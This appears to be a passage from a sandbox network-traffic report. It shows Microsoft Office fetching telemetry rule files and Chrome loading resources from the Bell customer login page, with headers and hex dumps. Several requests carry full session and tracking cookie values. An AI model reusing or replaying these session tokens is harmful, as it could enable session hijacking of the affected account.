                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      Server-Timing: dtSInfo;desc="0", dtRpid;desc="995444518", dtTao;desc="1"
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:07 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 96
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP025e8c23=028702b9c9718a69ccda5c161a00733ba6478f464a85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b95d928d2fe49eecf0285c093b48a7acad96a13a1e504a27fdb97ebf8496a63b9b; Path=/; Domain=.bell.ca; Secure; HttpOnly;
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab200092ef1db49b82ddd70fd631bf53f7cfcee05f18e16307d022d317d44e99080f7a0853c694db113000cf3018413db840b1e8264b5dc232ad4eac37ba4f1207501946e9e7373bcebf62912b59ff7b5b4466f823a254c5f49e9a; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:07 UTC96INData Raw: 0d 0a 0d 0a 54 65 61 6c 65 61 66 20 54 61 72 67 65 74 20 56 65 72 73 69 6f 6e 20 32 2e 30 0d 0a 0d 0a 0d 0a 52 65 61 64 20 32 35 33 36 37 20 62 79 74 65 73 2e 0d 0a 20 61 6e 64 20 44 61 74 65 74 69 6d 65 20 69 73 3a 20 31 30 2f 33 31 2f 32 30 32 34 20 39 3a 31 32 3a 30 37 20 41 4d 0d 0a
                                                                                                                                                                                                                                                                                                                                      Data Ascii: Tealeaf Target Version 2.0Read 25367 bytes. and Datetime is: 10/31/2024 9:12:07 AM


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      96192.168.2.94987913.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:07 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:07 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 9f581369-601e-00ab-15c9-2a66f4000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131207Z-16849878b78zqkvcwgr6h55x9n0000000930000000004fru
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      97192.168.2.94988213.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:07 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:08 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 405
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 9577fd14-901e-0016-4fa3-26efe9000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131208Z-16849878b78fhxrnedubv5byks0000000800000000001nv9
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      98192.168.2.94988113.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:08 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: af2b1dc9-001e-0066-0d6c-27561e000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131208Z-16849878b7867ttgfbpnfxt44s00000009dg00000000byb6
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      99192.168.2.94988013.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:08 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: dbd91de3-001e-002b-2827-2799f2000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131208Z-17c5cb586f626sn8grcgm1gf80000000082g000000007d41
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      100192.168.2.94988313.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:08 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 174
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 751cc90e-701e-003e-1dbd-2a79b3000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131208Z-17c5cb586f64sw5wh0dfzbdtvw00000001s00000000088b2
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:08 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      101192.168.2.949889206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC3207OUTGET /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=2219907894&en=gticcd0a&end=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5Cl [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC2188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 6
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab2000d76775c0eea8584a1636be5e94acd0e3a9b16f103fdba003c224af1ee92f6aab08d884545d113000b432fb72494dc76810033ec317cfbfcf62fe15bed26fbe78c923dda43bf22d36fef085c13810cee06027e5f1b2e39512; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC6INData Raw: 46 4c 28 4f 41 29
                                                                                                                                                                                                                                                                                                                                      Data Ascii: FL(OA)


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      102192.168.2.949891206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC2910OUTGET //Web/MYB/custom/image/echat/assets/Chat-Button-Bubbles(D).png HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; ktlvDW7IG5Cl [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:09 UTC2365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                      Expires: Fri, 01 Nov 2024 13:12:09 GMT
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Sun, 29 Aug 2021 15:37:57 GMT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      ETag: "1D79CEBD70E3880"
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
